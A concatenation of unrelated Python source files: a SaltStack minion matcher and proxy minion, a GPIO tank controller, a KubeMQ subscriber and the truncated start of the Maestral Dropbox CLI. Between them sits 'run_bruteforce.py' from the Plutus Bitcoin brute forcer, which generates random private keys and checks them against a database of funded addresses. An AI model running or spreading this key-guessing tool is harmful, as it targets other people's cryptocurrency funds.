log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
tgt = ipaddress.ip_network(tgt)
# Target is a network
proto = 'ipv{0}'.format(tgt.version)
if proto not in self.opts['grains']:
return False
else:
return salt.utils.network.in_subnet(tgt, self.opts['grains'][proto])
except: # pylint: disable=bare-except
try:
# Target should be an address
proto = 'ipv{0}'.format(ipaddress.ip_address(tgt).version)
if proto not in self.opts['grains']:
return False
else:
return tgt in self.opts['grains'][proto]
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target {0}"'.format(tgt))
return False
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar']:
log.error('No proxy key found in pillar for id '+self.opts['id']+'.')
log.error('Check your pillar configuration and contents. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
fq_proxyname = self.opts['pillar']['proxy']['proxytype']
self.opts['proxy'] = self.opts['pillar']['proxy']
# We need to do this again, because we are going to throw out a lot of grains.
self.opts['grains'] = salt.loader.grains(self.opts)
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
self.functions['saltutil.sync_proxymodules'](saltenv='base')
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules(proxy=self.proxy)
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
log.error('Proxymodule {0} is missing an init() or a shutdown() or both.'.format(fq_proxyname))
log.error('Check your proxymodule. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts)
# Check config 'add_proxymodule_to_opts' Remove this in Boron.
if self.opts['add_proxymodule_to_opts']:
self.opts['proxymodule'] = self.proxy
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
|
run_bruteforce.py
|
# Plutus Bitcoin Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
import multiprocessing
import bitcoinlib
import plutus
import oldKeyGen
import newKeyGen
def main(database):
print('Working...')
while True:
# Improved
key = newKeyGen.keygen_random()
plutus.process(key[0], key[2], key[3], database)
plutus.process(key[0], key[2], key[4], database)
# Original
# private_key = oldKeyGen.generate_private_key()
# public_key = oldKeyGen.private_key_to_public_key(private_key)
# address = oldKeyGen.public_key_to_address(public_key)
# plutus.process(private_key, public_key, address, database)
if __name__ == '__main__':
database = plutus.read_database()
# for cpu in range(multiprocessing.cpu_count()):
# for cpu in range(1):
# multiprocessing.Process(target=main, args=(database, )).start()
main(database)
|
control_tank.py
|
import logging
import os
import subprocess
import threading
import time
logger = logging.getLogger(__name__)
class ControlTank:
PWM_DUTY_A: float = 0.9
PWM_DUTY_B: float = 0.9
def __init__(self) -> None:
self._enable_a: bool = False
self._enable_b: bool = False
self._pwm_thread_a = threading.Thread(target=self._pwm_a_loop)
self._pwm_thread_b = threading.Thread(target=self._pwm_b_loop)
def initialize(self) -> bool:
ret = self._setup_gpio()
if ret is False:
return False
ret = self.stop()
if ret is False:
return False
# self._start_pwm_threads()
return True
def _setup_gpio(self) -> bool:
# Map GPIO12, GPIO13, GPIO14, GPIO15 (pin 37, 22, 13, 18)
with open("/sys/class/gpio/export", "w") as dev_file:
if os.path.exists("/sys/class/gpio/gpio12") is False:
ret = subprocess.run(["echo", "12"], stdout=dev_file)
if ret.returncode != 0:
return False
if os.path.exists("/sys/class/gpio/gpio13") is False:
ret = subprocess.run(["echo", "13"], stdout=dev_file)
if ret.returncode != 0:
return False
if os.path.exists("/sys/class/gpio/gpio14") is False:
ret = subprocess.run(["echo", "14"], stdout=dev_file)
if ret.returncode != 0:
return False
if os.path.exists("/sys/class/gpio/gpio15") is False:
ret = subprocess.run(["echo", "15"], stdout=dev_file)
if ret.returncode != 0:
return False
# Wait for mapping GPIO
time.sleep(3)
# Set direction as out on GPIO12 (pin 37)
with open("/sys/class/gpio/gpio12/direction", "w") as dev_file:
ret = subprocess.run(["echo", "out"], stdout=dev_file)
if ret.returncode != 0:
return False
# Set direction as out on GPIO13 (pin 22)
with open("/sys/class/gpio/gpio13/direction", "w") as dev_file:
ret = subprocess.run(["echo", "out"], stdout=dev_file)
if ret.returncode != 0:
return False
# Set direction as out on GPIO14 (pin 13)
with open("/sys/class/gpio/gpio14/direction", "w") as dev_file:
ret = subprocess.run(["echo", "out"], stdout=dev_file)
if ret.returncode != 0:
return False
# Set direction as out on GPIO15 (pin 18)
with open("/sys/class/gpio/gpio15/direction", "w") as dev_file:
ret = subprocess.run(["echo", "out"], stdout=dev_file)
if ret.returncode != 0:
return False
return True
def _set_gpio(self, addr: int, value: int) -> bool:
with open(f"/sys/class/gpio/gpio{addr}/value", "w") as dev_file:
ret = subprocess.run(["echo", f"{value}"], stdout=dev_file)
if ret.returncode != 0:
return False
return True
def move_forward(self) -> bool:
ret = self._set_gpio(12, 0)
if ret is False:
return False
ret = self._set_gpio(13, 1)
if ret is False:
return False
ret = self._set_gpio(14, 0)
if ret is False:
return False
ret = self._set_gpio(15, 1)
if ret is False:
return False
return True
def move_backward(self) -> bool:
ret = self._set_gpio(12, 1)
if ret is False:
return False
ret = self._set_gpio(13, 0)
if ret is False:
return False
ret = self._set_gpio(14, 1)
if ret is False:
return False
ret = self._set_gpio(15, 0)
if ret is False:
return False
return True
def turn_clockwise(self) -> bool:
ret = self._set_gpio(12, 1)
if ret is False:
return False
ret = self._set_gpio(13, 0)
if ret is False:
return False
ret = self._set_gpio(14, 0)
if ret is False:
return False
ret = self._set_gpio(15, 1)
if ret is False:
return False
return True
def turn_counterclockwise(self) -> bool:
ret = self._set_gpio(12, 0)
if ret is False:
return False
ret = self._set_gpio(13, 1)
if ret is False:
return False
ret = self._set_gpio(14, 1)
if ret is False:
return False
ret = self._set_gpio(15, 0)
if ret is False:
return False
return True
def stop(self) -> bool:
ret = self._set_gpio(12, 1)
if ret is False:
return False
ret = self._set_gpio(13, 1)
if ret is False:
return False
ret = self._set_gpio(14, 1)
if ret is False:
return False
ret = self._set_gpio(15, 1)
if ret is False:
return False
return True
def _start_pwm_threads(self) -> None:
self._pwm_thread_a.start()
self._pwm_thread_b.start()
def _pwm_a_loop(self) -> None:
while True:
if self._enable_a is True:
self._set_gpio(13, 1)
time.sleep(ControlTank.PWM_DUTY_A / 10)
self._set_gpio(13, 0)
time.sleep(0.1 - ControlTank.PWM_DUTY_A / 10)
else:
self._set_gpio(13, 0)
def _pwm_b_loop(self) -> None:
while True:
if self._enable_b is True:
self._set_gpio(15, 1)
time.sleep(ControlTank.PWM_DUTY_B / 10)
self._set_gpio(15, 0)
time.sleep(0.1 - ControlTank.PWM_DUTY_B / 10)
else:
self._set_gpio(15, 0)
def _set_moter_direction_a(self, value: int):
return self._set_gpio(12, value)
def _set_moter_direction_b(self, value: int):
return self._set_gpio(14, value)
def move_forward_pwm(self) -> None:
ret = self._set_moter_direction_a(0)
if ret is False:
logger.error("failed to move_forward")
return
ret = self._set_moter_direction_b(0)
if ret is False:
logger.error("failed to move_forward")
return
self._enable_a = True
self._enable_b = True
def move_backward_pwm(self) -> None:
ret = self._set_moter_direction_a(1)
if ret is False:
logger.error("failed to move_backward")
return
ret = self._set_moter_direction_b(1)
if ret is False:
logger.error("failed to move_backward")
return
self._enable_a = True
self._enable_b = True
def turn_clockwise_pwm(self) -> None:
ret = self._set_moter_direction_a(1)
if ret is False:
logger.error("failed to turn_clockwise")
return
ret = self._set_moter_direction_b(0)
if ret is False:
logger.error("failed to turn_clockwise")
return
self._enable_a = True
self._enable_b = True
def turn_counterclockwise_pwm(self) -> None:
ret = self._set_moter_direction_a(0)
if ret is False:
logger.error("failed to turn_counterclockwise")
return
ret = self._set_moter_direction_b(1)
if ret is False:
logger.error("failed to turn_counterclockwise")
return
self._enable_a = True
self._enable_b = True
def stop_pwm(self) -> None:
self._enable_a = False
self._enable_b = False
def finalize_pwm(self) -> None:
self._pwm_thread_a.join()
self._pwm_thread_b.join()
|
subscriber.py
|
import logging
import threading
import grpc
from kubemq.grpc import Empty
from kubemq.basic.grpc_client import GrpcClient
from kubemq.events.event_receive import EventReceive
from kubemq.subscription import SubscribeType, EventsStoreType
from kubemq.tools.listener_cancellation_token import ListenerCancellationToken
logger = logging.getLogger(__name__)
class Subscriber(GrpcClient):
def __init__(self, kubemq_address=None, encryptionHeader=None):
"""
Initialize a new Sender under the requested KubeMQ Server Address.
:param str kubemq_address: KubeMQ server address. if None will be parsed from Config or environment parameter.
:param byte[] encryptionHeader: the encrypted header requested by kubemq authentication.
"""
GrpcClient.__init__(self, encryptionHeader)
if kubemq_address:
self._kubemq_address = kubemq_address
def ping(self):
"""ping check connection to the kubemq"""
ping_result = self.get_kubemq_client().Ping(Empty())
logger.debug("event subscriber KubeMQ address:%s ping result:%s'" % (self._kubemq_address, ping_result))
return ping_result
def subscribe_to_events(self, subscribe_request, handler, error_handler,
listener_cancellation_token=ListenerCancellationToken()):
"""
Register to kubeMQ Channel using handler.
:param SubscribeRequest subscribe_request: represent by that will determine the subscription configuration.
:param handler: Method the perform when receiving EventReceive
:param error_handler: Method the perform when receiving error from kubemq
:param listener_cancellation_token: cancellation token, once cancel is called will cancel the subscribe to kubemq
:return: A thread running the Subscribe Request.
"""
if not subscribe_request.channel:
raise ValueError("channel parameter is mandatory.")
if not subscribe_request.is_valid_type("Events"):
raise ValueError("Invalid Subscribe Type for this Class.")
if subscribe_request.subscribe_type == SubscribeType.EventsStore:
if not subscribe_request.client_id:
raise ValueError("client_id parameter is mandatory.")
if subscribe_request.events_store_type == EventsStoreType.Undefined:
raise ValueError("events_store_type parameter is mandatory.")
inner_subscribe_request = subscribe_request.to_inner_subscribe_request()
call = self.get_kubemq_client().SubscribeToEvents(inner_subscribe_request, metadata=self._metadata)
def subscribe_to_event(listener_cancellation_token):
try:
while True:
event_receive = call.next()
logger.info("Subscriber Received Event: EventID:'%s', Channel:'%s', Body:'%s Tags:%s'" % (
event_receive.EventID,
event_receive.Channel,
event_receive.Body,
event_receive.Tags
))
handler(EventReceive(event_receive))
except grpc.RpcError as error:
if (listener_cancellation_token.is_cancelled):
logger.info("Sub closed by listener request")
error_handler(str(error))
else:
logger.exception("Subscriber Received Error: Error:'%s'" % (error))
error_handler(str(error))
except Exception as e:
logger.exception("Subscriber Received Error: Error:'%s'" % (e))
error_handler(str(e))
def check_sub_to_valid(listener_cancellation_token):
while True:
if (listener_cancellation_token.is_cancelled):
logger.info("Sub closed by listener request")
call.cancel()
return
thread = threading.Thread(target=subscribe_to_event, args=(listener_cancellation_token,))
thread.daemon = True
thread.start()
listener_thread = threading.Thread(target=check_sub_to_valid, args=(listener_cancellation_token,))
listener_thread.daemon = True
listener_thread.start()
return thread
|
cli.py
|
# -*- coding: utf-8 -*-
"""
This module defines the functions to configure and interact with Maestral from the
command line. Some imports are deferred to the functions that required them in order to
reduce the startup time of individual CLI commands.
"""
# system imports
import sys
import os
import os.path as osp
import functools
import time
from typing import Optional, Dict, List, Tuple, Callable, Union, cast, TYPE_CHECKING
# external imports
import click
# local imports
from . import __version__
from .utils import cli
if TYPE_CHECKING:
from click.shell_completion import CompletionItem
from datetime import datetime
from .main import Maestral
from .daemon import MaestralProxy
# ======================================================================================
# CLI dialogs and helper functions
# ======================================================================================
OK = click.style("[OK]", fg="green")
FAILED = click.style("[FAILED]", fg="red")
KILLED = click.style("[KILLED]", fg="red")
def stop_daemon_with_cli_feedback(config_name: str) -> None:
"""Wrapper around :meth:`daemon.stop_maestral_daemon_process`
with command line feedback."""
from .daemon import stop_maestral_daemon_process, Stop
click.echo("Stopping Maestral...", nl=False)
res = stop_maestral_daemon_process(config_name)
if res == Stop.Ok:
click.echo("\rStopping Maestral... " + OK)
elif res == Stop.NotRunning:
click.echo("\rMaestral daemon is not running.")
elif res == Stop.Killed:
click.echo("\rStopping Maestral... " + KILLED)
elif res == Stop.Failed:
click.echo("\rStopping Maestral... " + FAILED)
def select_dbx_path_dialog(
config_name: str, default_dir_name: Optional[str] = None, allow_merge: bool = False
) -> str:
"""
A CLI dialog to ask for a local Dropbox folder location.
:param config_name: The configuration to use for the default folder name.
:param default_dir_name: The default directory name. Defaults to
"Dropbox ({config_name})" if not given.
:param allow_merge: If ``True``, allows the selection of an existing folder without
deleting it. Defaults to ``False``.
:returns: Path given by user.
"""
from .utils.path import delete
default_dir_name = default_dir_name or f"Dropbox ({config_name.capitalize()})"
while True:
res = cli.select_path(
"Please choose a local Dropbox folder:",
default=f"~/{default_dir_name}",
files_allowed=False,
)
res = res.rstrip(osp.sep)
dropbox_path = osp.expanduser(res)
if osp.exists(dropbox_path):
if allow_merge:
text = (
"Directory already exists. Do you want to replace it "
"or merge its content with your Dropbox?"
)
choice = cli.select(text, options=["replace", "merge", "cancel"])
else:
text = (
"Directory already exists. Do you want to replace it? "
"Its content will be lost!"
)
replace = cli.confirm(text)
choice = 0 if replace else 2
if choice == 0:
err = delete(dropbox_path)
if err:
cli.warn(
"Could not write to selected location. "
"Please make sure that you have sufficient permissions."
)
else:
cli.ok("Replaced existing folder")
return dropbox_path
elif choice == 1:
cli.ok("Merging with existing folder")
return dropbox_path
else:
return dropbox_path
def link_dialog(m: Union["MaestralProxy", "Maestral"]) -> None:
"""
A CLI dialog for linking a Dropbox account.
:param m: Proxy to Maestral daemon.
"""
authorize_url = m.get_auth_url()
cli.info(f"Linking new account for '{m.config_name}' config")
cli.info("Retrieving auth code from Dropbox")
choice = cli.select(
"How would you like to you link your account?",
options=["Open Dropbox website", "Print auth URL to console"],
)
if choice == 0:
click.launch(authorize_url)
else:
cli.info("Open the URL below to retrieve an auth code:")
cli.info(authorize_url)
res = -1
while res != 0:
auth_code = cli.prompt("Enter the auth code:")
auth_code = auth_code.strip()
res = m.link(auth_code)
if res == 0:
email = m.get_state("account", "email")
cli.ok(f"Linked to {email}")
elif res == 1:
cli.warn("Invalid token, please try again")
elif res == 2:
cli.warn("Could not connect to Dropbox, please try again")
def check_for_updates() -> None:
"""
Checks if updates are available by reading the cached release number from the
config file and notifies the user. Prints an update note to the command line.
"""
from packaging.version import Version
from .config import MaestralConfig, MaestralState
conf = MaestralConfig("maestral")
state = MaestralState("maestral")
interval = conf.get("app", "update_notification_interval")
last_update_check = state.get("app", "update_notification_last")
latest_release = state.get("app", "latest_release")
if interval == 0 or time.time() - last_update_check < interval:
return
has_update = Version(__version__) < Version(latest_release)
if has_update:
cli.echo(
f"Update available v{__version__} → v{latest_release}. "
f"Please use your package manager to update."
)
def check_for_fatal_errors(m: Union["MaestralProxy", "Maestral"]) -> bool:
"""
Checks the given Maestral instance for fatal errors such as revoked Dropbox access,
deleted Dropbox folder etc. Prints a nice representation to the command line.
:param m: Proxy to Maestral daemon or Maestral instance.
:returns: True in case of fatal errors, False otherwise.
"""
import textwrap
maestral_err_list = m.fatal_errors
if len(maestral_err_list) > 0:
width = cli.get_term_width()
err = maestral_err_list[0]
err_title = cast(str, err["title"])
err_msg = cast(str, err["message"])
wrapped_msg = textwrap.fill(err_msg, width=width)
click.echo("")
click.secho(err_title, fg="red")
click.secho(wrapped_msg, fg="red")
click.echo("")
return True
else:
return False
def convert_api_errors(func: Callable) -> Callable:
"""
Decorator that catches a MaestralApiError and prints a formatted error message to
stdout before exiting. Calls ``sys.exit(1)`` after printing the error to stdout.
"""
from .errors import MaestralApiError
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except MaestralApiError as exc:
cli.warn(f"{exc.title}. {exc.message}")
sys.exit(1)
return wrapper
def _datetime_from_iso_str(time_str: str) -> "datetime":
"""
Converts an ISO 8601 time string such as '2015-05-15T15:50:38Z' to a timezone aware
datetime object in the local time zone.
"""
from datetime import datetime
# replace Z with +0000, required for Python 3.6 compatibility
time_str = time_str.replace("Z", "+0000")
return datetime.strptime(time_str, "%Y-%m-%dT%H:%M:%S%z").astimezone()
# ======================================================================================
# Custom parameter types
# ======================================================================================
# A custom parameter:
# * needs a name
# * needs to pass through None unchanged
# * needs to convert from a string
# * needs to convert its result type through unchanged (eg: needs to be idempotent)
# * needs to be able to deal with param and context being None. This can be the case
# when the object is used with prompt inputs.
class DropboxPath(click.ParamType):
"""A command line parameter representing a Dropbox path
:param file_okay: Controls if a file is a possible value.
:param dir_okay: Controls if a directory is a possible value.
"""
name = "Dropbox path"
envvar_list_splitter = osp.pathsep
def __init__(self, file_okay: bool = True, dir_okay: bool = True) -> None:
self.file_okay = file_okay
self.dir_okay = dir_okay
def convert(
self,
value: Optional[str],
param: Optional[click.Parameter],
ctx: Optional[click.Context],
) -> Optional[str]:
if value is None:
return value
if not value.startswith("/"):
value = "/" + value
return value
def shell_complete(
self,
ctx: Optional[click.Context],
param: Optional[click.Parameter],
incomplete: str,
) -> List["CompletionItem"]:
from click.shell_completion import CompletionItem
from .utils import removeprefix
from .config import MaestralConfig
matches: List[str] = []
completions: List[CompletionItem] = []
# check if we have been given an absolute path
absolute = incomplete.startswith("/")
incomplete = incomplete.lstrip("/")
# get the Maestral config for which to complete paths
config_name = ctx.params.get("config_name", "maestral") if ctx else "maestral"
# get all matching paths in our local Dropbox folder
# TODO: query from server if not too slow
config = MaestralConfig(config_name)
dropbox_dir = config.get("sync", "path")
local_incomplete = osp.join(dropbox_dir, incomplete)
local_dirname = osp.dirname(local_incomplete)
try:
with os.scandir(local_dirname) as it:
for entry in it:
if entry.path.startswith(local_incomplete):
if self.file_okay and entry.is_file():
dbx_path = removeprefix(entry.path, dropbox_dir)
matches.append(dbx_path)
if self.dir_okay and entry.is_dir():
dbx_path = removeprefix(entry.path, dropbox_dir)
matches.append(dbx_path)
except OSError:
pass
# get all matching excluded items
for dbx_path in config.get("sync", "excluded_items"):
if dbx_path.startswith("/" + incomplete):
matches.append(dbx_path)
for match in matches:
if not absolute:
match = match.lstrip("/")
completions.append(CompletionItem(match))
return completions
class ConfigKey(click.ParamType):
"""A command line parameter representing a config key"""
name = "key"
def shell_complete(
self,
ctx: Optional[click.Context],
param: Optional[click.Parameter],
incomplete: str,
) -> List["CompletionItem"]:
from click.shell_completion import CompletionItem
from .config.main import KEY_SECTION_MAP as KEYS
return [CompletionItem(key) for key in KEYS if key.startswith(incomplete)]
class ConfigName(click.ParamType):
"""A command line parameter representing a Dropbox path
:param existing: If ``True`` require an existing config, otherwise create a new
config on demand.
"""
name = "config"
def __init__(self, existing: bool = True) -> None:
self.existing = existing
def convert(
self,
value: Optional[str],
param: Optional[click.Parameter],
ctx: Optional[click.Context],
) -> Optional[str]:
if value is None:
return value
from .config import validate_config_name, list_configs
if not self.existing:
# accept all valid config names
try:
return validate_config_name(value)
except ValueError:
raise cli.CliException(
"Configuration name may not contain any whitespace"
)
else:
# accept only existing config names
if value in list_configs():
return value
else:
raise cli.CliException(
f"Configuration '{value}' does not exist. "
f"Use 'maestral config-files' to list all configurations."
)
def shell_complete(
self,
ctx: Optional[click.Context],
param: Optional[click.Parameter],
incomplete: str,
) -> List["CompletionItem"]:
from click.shell_completion import CompletionItem
from .config import list_configs
matches = [conf for conf in list_configs() if conf.startswith(incomplete)]
return [CompletionItem(m) for m in matches]
# ======================================================================================
# Command groups
# ======================================================================================
class OrderedGroup(click.Group):
"""Click command group with customizable order of help output."""
def command(self, *args, **kwargs) -> Callable:
"""Behaves the same as :meth:`click.Group.command()` except captures a section
name for listing command names in help.
"""
section = kwargs.pop("section", "Commands")
from click.decorators import command
def decorator(f):
cmd = command(*args, **kwargs)(f)
cmd.section = section
self.add_command(cmd)
return cmd
return decorator
def group(self, *args, **kwargs) -> Callable:
"""Behaves the same as :meth:`click.Group.group()` except captures a section
name for listing command names in help.
"""
section = kwargs.pop("section", "Commands")
from click.decorators import group
def decorator(f):
cmd = group(*args, **kwargs)(f)
cmd.section = section
self.add_command(cmd)
return cmd
return decorator
def format_commands(
self, ctx: click.Context, formatter: click.HelpFormatter
) -> None:
"""Extra format methods for multi methods that adds all the commands
after the options.
"""
commands = []
for name in self.commands:
cmd = self.get_command(ctx, name)
# What is this, the tool lied about a command. Ignore it
if cmd is None:
continue
if cmd.hidden:
continue
commands.append((name, cmd))
# allow for 3 times the default spacing
if len(commands) > 0:
max_len = max(len(name) for name, cmd in commands)
limit = formatter.width - 6 - max_len # type: ignore
sections: Dict[str, List[Tuple[str, click.Command]]] = {}
# group commands into sections
for name, cmd in commands:
try:
sections[cmd.section].append((name, cmd)) # type: ignore
except KeyError:
sections[cmd.section] = [(name, cmd)] # type: ignore
# format sections individually
for section, cmds in sections.items():
rows = []
for name, cmd in cmds:
name = name.ljust(max_len)
help = cmd.get_short_help_str(limit)
rows.append((name, help))
if rows:
with formatter.section(section):
formatter.write_dl(rows)
@click.group(cls=OrderedGroup, help="Dropbox client for Linux and macOS.")
@click.version_option(version=__version__, message=__version__)
def main():
pass
# ======================================================================================
# Core commands
# ======================================================================================
config_option = click.option(
"-c",
"--config-name",
default="maestral",
type=ConfigName(existing=False),
is_eager=True,
expose_value=True,
help="Run command with the given configuration.",
)
existing_config_option = click.option(
"-c",
"--config-name",
default="maestral",
type=ConfigName(),
is_eager=True,
expose_value=True,
help="Run command with the given configuration.",
)
@main.command(section="Core Commands", help="Start the sync daemon.")
@click.option(
"--foreground",
"-f",
is_flag=True,
default=False,
help="Start Maestral in the foreground.",
)
@click.option(
"--verbose",
"-v",
is_flag=True,
default=False,
help="Print log messages to stderr.",
)
@config_option
@convert_api_errors
def start(foreground: bool, verbose: bool, config_name: str) -> None:
import threading
from .daemon import (
MaestralProxy,
start_maestral_daemon,
start_maestral_daemon_process,
wait_for_startup,
is_running,
Start,
CommunicationError,
)
check_for_updates()
if is_running(config_name):
click.echo("Daemon is already running.")
return
@convert_api_errors
def startup_dialog():
try:
